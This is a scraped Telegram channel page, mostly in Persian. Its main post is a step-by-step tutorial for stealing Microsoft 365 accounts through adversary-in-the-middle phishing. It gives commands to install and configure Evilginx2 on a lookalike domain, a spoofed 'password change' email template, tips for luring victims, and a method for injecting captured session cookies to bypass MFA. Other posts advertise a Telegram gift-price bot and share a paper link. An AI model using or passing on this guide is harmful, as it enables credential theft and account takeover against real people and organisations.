ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ
6.51K subscribers
147 photos
46 videos
97 files
198 links
Dear @durov
In this channel there isn't any content that violates copyright laws.
Contents of this channel are for helping people.
Please ignore traitors reports.
Thank yo

❗️ هر استفاده نادرست به عهده خود شخص میباشد ❗️
Download Telegram
⭐️دسترسی به حساب Microsoft 365 که با رمز عبور و تایید دومرحله‌ای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA


مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت

کاری که می‌کنیم
یه دامنه تقلبی ثبت می‌کنیم مثلا

m1crosoft-support.com
به جای حرف i از عدد 1 استفاده کردیم

این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته

دامنه رو از یه جایی می‌خریم که گواهی امنیتی رایگان HTTPS میده مثل
Namecheap
Porkbun

تنظیم می‌کنیم که این دامنه به سرور ما VPS وصل بشه

مرحله ۲ راه‌اندازی ابزار Evilginx2 روی سرور

Evilginx2 یه ابزار فیشینگ حرفه‌ایه که کمک می‌کنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم

ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه

نصب ابزارها با دستور

sudo apt update && sudo apt install git make gcc certbot -y
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx

تنظیمات اولیه برای دامنه

config domain m1crosoft-support.com
config ip آی پی سرور شما
config redirect_url https://login.microsoftonline.com
config site microsoft
enable microsoft


گرفتن گواهی امنیتی HTTPS رایگان

sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns

و بعد فایل‌های امنیتی رو به Evilginx2 معرفی میکنیم

config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem

config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem


مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف

هدف اینه که کاربر روی لینک جعلی کلیک کنه

نمونه متن ایمیل میتونه به این صورت باشه

موضوع : مهم تغییر اجباری رمز حساب Microsoft 365

کاربر گرامی
برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید

https://m1crosoft-support com/auth

ترفندهایی که میتونیم بزنیم:

جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه

استفاده از لینک‌های کوتاه یا QR Code برای پنهان کردن لینک جعلی

ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک


مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر

وقتی کاربر روی لینک کلیک می‌کنه

سایت جعلی ما باز میشه
Evilginx2 اطلاعات ورود کاربر رو می‌گیره ولی هم‌زمان کاربر واقعا وارد Microsoft میشه
در پشت صحنه ما توکن‌های ورود Session Token رو از مرورگر کاربر می‌گیریم

مثلا چیزی شبیه این توی لاگ‌ها ظاهر میشه

Captured new credentials
Username user@company.com
Session Tokens {...}


مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA

الان که توکن‌ها رو داریم نیازی به رمز عبور یا تایید MFA نیست

برای استفاده از توکن

مرورگر مثلا Chrome رو باز کن
یه تب مخفی incognito باز کن
برو به DevTools F12 تب Application بخش Cookies
مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکی‌ها اضافه کن
صفحه Microsoft 365 رو ریفرش کن

ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه


#red_team
#phising
#Evilginx2

⚜️ @Expire_Security ⚜️
Please open Telegram to view this post
VIEW IN TELEGRAM
3
QLPro.pdf
1.8 MB
QLPro: Automated Code Vulnerability Discovery via LLM and Static
Code Analysis Integration

⚜️ @Expire_Security ⚜️
⭕️ وب سرویس پیشرفته قیمت گیفت ⭕️

هم قیمت پورتال میده هم تونل و هم مارکت🔵

🕦 تغییرات ۲۴ ساعته و هفتگی 🕦

🖥 نمایش مقدار سود ضرر گیفت 🖥

😵🤔🙁😝 @Dev_Clown 😤☹️🙁☹️
Please open Telegram to view this post
VIEW IN TELEGRAM
5
🔥 برای دریافت قیمت گیفت خود کافی است لینک گیفت را ارسال کنید. مانند:
t.me/nft/VintageCigar-10319

💥 یا اسم گیفت را به همراه علامت سوال وارد کنید. مانند:
Pepe?

🆔 @EX_Panel_Bot 🆔
13.3K3🤡1
🔥 ایده و کانسپت من برای گیفت‌های مناسبتی:
سوزاندن گیفت‌های قدیمی برای خرید گیفت‌های جدید.

از اون‌جایی که احتمالاً قراره بی‌نهایت گیفت مناسبتی داشته باشیم، به نظرم خیلی خوب میشه اگه خرید بعضی از این گیفت‌ها نیاز به سوزوندن گیفت‌های قدیمی همون مناسبت داشته باشه. 📈

مثلاً برای خرید گیفت 🎁 در ولنتاین، کاربر ابتدا باید یکی از گیفت‌های 🎁 یا 🎁 که مربوط به ولنتاین قبلی بودن رو بسوزونه و سپس با پرداخت استارز گیفت جدید رو بخره.

چرا ایده خوبیه؟
- از خرید انبوه ربات‌ها خلاص میشیم.
- ساپلای گیفت‌های قدیمی کم میشه.
- هربار گیفت جدید میاد به جای اینکه گیفت‌های قدیمی فراموش و بی‌ارزش بشن، ارزششون بالاتر میره.
- سوزوندن صرفا قفل خریدن رو باز میکنه و نیازه که بعدش استارز پرداخت بشه، پس تلگرام ضرری نمیکنه و همه چیز دو سر سود هست.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
48K2🤡2🔥1
عیدتون مبارک ❤️
۱ سال دیگه هم زنده ماندیم 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
8002